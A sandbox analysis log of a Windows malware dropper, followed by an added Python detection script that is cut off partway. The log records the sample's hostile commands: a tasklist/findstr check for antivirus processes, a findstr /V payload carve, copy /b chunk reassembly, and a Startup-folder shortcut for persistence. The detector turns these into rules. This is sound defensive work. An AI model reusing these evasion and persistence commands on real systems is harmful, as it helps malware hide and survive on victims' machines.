Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E59399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 10_2_00E59399
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_00938DE9 AdjustTokenPrivileges,CloseHandle, 16_2_00938DE9
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_00939399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 16_2_00939399
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Code function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E64148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 10_2_00E64148
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Code function: 0_2_004024FB CoCreateInstance, 0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E6443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 10_2_00E6443D
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif File created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6908:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4248:120:WilError_03
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe File created: C:\Users\user\AppData\Local\Temp\nsk814.tmp Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.bat
Source: cW5i0RdQ4L.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: cW5i0RdQ4L.exe Virustotal: Detection: 13%
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe File read: C:\Users\user\Desktop\cW5i0RdQ4L.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\cW5i0RdQ4L.exe "C:\Users\user\Desktop\cW5i0RdQ4L.exe"
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.bat
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 103495
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "aroundaccommodategroupseverything" Fine
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Correct + ..\Transparent + ..\Barbie + ..\Gloves + ..\Latin + ..\Story + ..\Ski + ..\Appraisal n
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Powder.pif n
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url" & echo URL="C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js"
Source: C:\Windows\SysWOW64\findstr.exe Process created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\O"
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.bat Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 103495 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "aroundaccommodategroupseverything" Fine Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Correct + ..\Transparent + ..\Barbie + ..\Gloves + ..\Latin + ..\Story + ..\Ski + ..\Appraisal n Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Powder.pif n Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url" & echo URL="C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url" & exit Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\O" Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Section loaded: winrnr.dll Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window Recorder Window detected: More than 3 window changes detected
Source: cW5i0RdQ4L.exe Static file information: File size 1086602 > 1048576
Source: cW5i0RdQ4L.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E1CBDB push eax; retf 10_2_00E1CBF8
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Code function: 10_2_00E28B75 push ecx; ret 10_2_00E28B88
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr Code function: 16_2_00908B75 push ecx; ret 16_2_00908B88
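The process tree recorded above (cmd /c move Centres Centres.bat, tasklist piped into findstr for security-product names, findstr /V carving Powder.pif out of Fine, copy /b reassembling n from eight chunks, Powder.pif n, the echo into the Startup folder, and wscript.exe starting the .scr) is the part of this report a detection engineer would turn into rules. The Python below is an added example, not part of the Joe Sandbox report or of the sample: it encodes those rules and runs them over constructed process-creation events whose command lines are taken from the report. The event schema (pid, ppid, parent_image, image, cmdline) is an assumption about the log source, and the product-name list is simply the set of names the batch file itself greps for. The .pif/.scr rule deliberately ignores the parent process, because the report attributes the .scr to findstr.exe in one place and to wscript.exe in another.

```python
"""Process-creation triage for the batch loader chain recorded in this report.

Added example, not part of the Joe Sandbox report. Rules are derived from the
process tree above; events are constructed, with command lines taken from the
report; the fields (pid, ppid, parent_image, image, cmdline) are an assumed schema.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# Security-product process names the dropped batch greps for (from the findstr lines).
AV_PROCESS_NAMES = {"wrsa", "opssvc", "avastui", "avgui", "bdservicehost",
                    "nswscsvc", "sophoshealth"}
SCRIPT_EXT = r"\.(js|jse|vbs|vbe|wsf|hta|cmd|bat|ps1)\b"


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    parent_image: str
    image: str
    cmdline: str


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def _tokens(cmdline):
    # Split on whitespace and double quotes; enough for findstr/copy argument lists.
    return {t for t in re.split(r'[\s"]+', cmdline.lower()) if t}


def detect(events):
    """Return (rule, pid) pairs for every event that matches a rule."""
    children = defaultdict(list)              # ppid -> events, for sibling correlation
    for ev in events:
        children[ev.ppid].append(ev)
    hits = []
    for ev in events:
        base, parent = _basename(ev.image), _basename(ev.parent_image)
        toks, low, img = _tokens(ev.cmdline), ev.cmdline.lower(), ev.image.lower()
        # tasklist | findstr <product names>: findstr carrying security-product names
        # with a tasklist sibling under the same cmd.exe (the pipeline's two halves).
        if base == "findstr.exe" and AV_PROCESS_NAMES & toks and \
                any(_basename(s.image) == "tasklist.exe" for s in children[ev.ppid]):
            hits.append(("av_process_discovery", ev.pid))
        # findstr /V "<marker>" <file>: drops every line holding the marker, which
        # carves a PE padded with marker lines back out (how Powder.pif is produced).
        if base == "findstr.exe" and "/v" in toks:
            hits.append(("findstr_inverse_carve", ev.pid))
        # copy /b a + b + c ... out: payload reassembled from three or more chunks.
        if base == "cmd.exe" and "copy /b" in low and low.count(" + ") >= 2:
            hits.append(("binary_chunk_concat", ev.pid))
        # .pif/.scr running out of AppData; parent-independent on purpose, since the
        # report attributes the .scr to findstr.exe in one place and wscript.exe in another.
        if base.endswith((".pif", ".scr")) and "\\appdata\\" in img:
            hits.append(("appdata_pif_scr_execution", ev.pid))
        # echo [InternetShortcut] / URL=<local script> into the Startup folder.
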